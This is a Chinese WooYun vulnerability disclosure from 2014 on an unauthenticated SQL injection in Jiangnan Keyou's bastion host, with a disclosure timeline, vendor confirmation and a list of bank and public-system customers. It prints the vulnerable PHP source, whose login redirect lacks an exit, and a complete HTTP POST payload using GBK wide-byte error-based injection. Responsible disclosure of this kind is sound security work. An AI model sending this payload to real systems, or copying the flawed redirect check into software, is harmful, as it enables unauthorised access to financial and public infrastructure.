当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-077088

漏洞标题:江南科友堡垒机无需登录通用注入漏洞

相关厂商:江南科友科技有限公司

漏洞作者: conqu3r

提交时间:2014-09-24 09:09

修复时间:2014-12-23 09:10

公开时间:2014-12-23 09:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-09-24: 细节已通知厂商并且等待厂商处理中
2014-09-28: 厂商已经确认,细节仅向厂商公开
2014-10-01: 细节向第三方安全合作伙伴开放
2014-11-22: 细节向核心白帽子及相关领域专家公开
2014-12-02: 细节向普通白帽子公开
2014-12-12: 细节向实习白帽子公开
2014-12-23: 细节向公众公开

简要描述:

通用注入漏洞,不需要登录!

详细说明:

江南科友堡垒机全版本getshell(无需登录)
#1 漏洞设计客户如下:
国内各大银行:中国银行、民生银行、广东发展银行、平安银行、深圳发展银行、浦发银行、渤海银行总行及各分行、中国工商银行、中国农业银行、中国建设银行、交通银行、招商银行、中信银行、兴业银行、华夏银行、中国邮政储蓄银行总行或部分分行
中国银联:总公司及北京、广州、深圳、南京、福州、长沙、武汉、济南、青岛、沈阳、郑州、海口、天津、香港、厦门等分公司
银联数据:全国卡系统业务托管商业银行
外资银行:渣打银行、东亚银行:全国境内各个分行
外资金融机构:韩亚银行、花旗银行、通用电气、星展银行、美国第一资讯(FDC)
地方商业银行及农村信用社:40余家商业银行及农村信用社
社会保障与公共交通系统:湖北、黑龙江、广东、北京等社保卡安全系统,上海市公交一卡通安全系统,杭州市市民卡系统,长春一汽企业IC卡加密系统,宁波市民卡系统,郑州交通一卡通系统,山东一卡通系统
(摘自官网:http://www.keyou.cn/JN_case/case-cg.aspx)
请自查....

漏洞证明:

存在GBK宽字节注入。
漏洞文件/manager/config_os.php

<?
			require_once('interface.php');
			require_once('SSO_DB.php');
			require_once('class.smarttemplate.php');
			
			//session_id(SID);
			session_start();
			$account_os=$_SESSION['account_os'];
			$time = $_SESSION['time'];
			$error=0;
			//echo $time;
			//echo $_GET['flag'];
			if( empty($account_os) || $_GET['flag'] != $time || empty($_GET['flag']) )
			{
				Header("Location: login.php"); //没有增加exit(1)导致后续语句继续执行,并没有退出,后续就可以直接注入了。
			}
			$st = new SmartTemplate('config_os.html'); 
			$db = new SSO_DB();
			if(isset($_POST['action']) && !empty($_POST['action']))//ɾ������ҳ��
			{
				if($_POST['action'] == 'add')  //���
				{
					$add_s=$db->os_add($_POST['f_os_name'],$_POST['v_os_name'],$_POST['os_mem'],$_POST['AdminCmd_value'],$_POST['AdminPassInfo_value']);
					if(!$add_s)
					{
						//echo '<script type="text/javascript">';
						//echo 'alert("����ϵͳ����Ѵ���")';
						//echo '</script>';
						$error = -1;
					}
					else
					{
						write_ed();
						//echo '<script type="text/javascript">';
						//echo 'alert("��ӳɹ�")';
						//echo '</script>';
						$error = 1;
					}
				}
				if($_POST['action'] == 'del')  //ɾ��
				{
					//echo $_POST['post_id'];
					$db->os_del($_POST['post_id']);
					write_ed();
					//echo '<script type="text/javascript">';
					//echo 'alert("ɾ��ɹ�")';
					//echo '</script>';
					$error = 2;
				}
			}
			if(isset($_POST['edit_id']) && $_POST['action']== 'edit' && !empty($_POST['edit_id']) )  //�༭ȡ���
			{
				
					$db->os_edit($_POST['f_os_name'],$_POST['v_os_name'],$_POST['os_mem'],$_POST['edit_id'],$_POST['AdminCmd_value'],$_POST['AdminPassInfo_value']); //GBK注入
					write_ed();
					//echo '<script type="text/javascript">';
					//echo 'alert("�༭�ɹ�")';
					//echo '</script>';
					$error = 3;
			}


利用payload:

POST /manager/config_os.php HTTP/1.1
Host: x.x.x.x
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Proxy-Connection: keep-alive
Cookie: PHPSESSID=676fe13cb82d5ba15baccdd1decc0beb
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/600.1.17 (KHTML, like Gecko) Version/7.1 Safari/537.85.10
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 209
action=add&f_os_name=admin%df'and (select 1 from  (select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x)a)#&v_os_name=1&os_mem=2&admincmd_value=3&adminpassinfo_value=4


zr.png


该文件的add del方法都存在注入。

修复方案:

处理

版权声明:转载请注明来源 conqu3r@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2014-09-28 09:42

厂商回复:

最新状态:

暂无